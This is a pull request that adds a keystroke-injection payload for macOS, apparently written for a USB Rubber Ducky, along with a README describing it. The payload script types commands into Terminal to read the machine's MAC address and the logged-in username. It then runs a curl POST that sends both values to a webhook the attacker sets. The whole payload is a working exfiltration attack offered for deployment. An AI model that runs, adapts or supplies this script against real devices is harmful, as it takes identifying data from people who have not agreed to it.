### PR TITLE
Exfiltrate Mac Address - MacOS

### DIFF
--- a/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md
+++ b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/README.md
@@ -1,0 +1,25 @@
+# Exfiltrate Mac Address - MacOS
+
+This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.
+
+### Details
+
+- **Title**: Exfiltrate Mac Address
+- **Author**: bst04 - Aleff
+- **Version**: 1.0
+- **Category**: Exfiltration
+- **Target**: MacOS
+
+### Dependencies
+
+- Set the #WEBHOOK to complete the exfiltration
+   `DEFINE #WEBHOOK example`
+
+## How It Works 📜
+
+1. Sets a user-defined webhook (`#WEBHOOK`) to complete the exfiltration
+2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
+3. After readiness is confirmed, the script:
+   - Runs commands to open **Terminal**.
+   - Acquire the mac address and the system user name
+   - Send this informations through the Webhook

--- a/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrate-Mac-Address-MacOS/payload.txt
@@ -1,0 +1,55 @@
+REM_BLOCK
+####################################################
+#                                                  #
+# Title        : Exfiltrate Mac Address - MacOS    #
+# Author       : bst04 - Aleff                     #
+# Version      : 1.0                               #
+# Category     : Exfiltration                      #
+# Target       : MacOS                             #
+#                                                  #
+####################################################
+END_REM
+
+REM Set the #WEBHOOK to complete the exfiltration
+DEFINE #WEBHOOK example
+
+EXTENSION DETECT_READY
+    REM VERSION 1.1
+    REM AUTHOR: Korben
+
+    REM_BLOCK DOCUMENTATION
+        USAGE:
+            Extension runs inline (here)
+            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+            boot delay
+
+        TARGETS:
+            Any system that reflects CAPSLOCK will detect minimum required delay
+            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+    END_REM
+
+    REM CONFIGURATION:
+    DEFINE #RESPONSE_DELAY 25
+    DEFINE #ITERATION_LIMIT 120
+
+    VAR $C = 0
+    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+        CAPSLOCK
+        DELAY #RESPONSE_DELAY
+        $C = ($C + 1)
+    END_WHILE
+    CAPSLOCK
+END_EXTENSION
+
+REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
+DELAY 200
+
+GUI SPACE
+DELAY 250
+STRINGLN TERMINAL
+DELAY 750
+STRINGLN mac=$(networksetup -getmacaddress en0) 
+DELAY 750
+STRINGLN name=$(id -un)
+DELAY 850
+STRINGLN curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=User:$name | $mac" #WEBHOOK


### PR DESCRIPTION
This payload is designed to retrieve the MAC address and username from a macOS system and send this information to a specified webhook.

Developer by [bst04](https://github.com/brunoooost) and me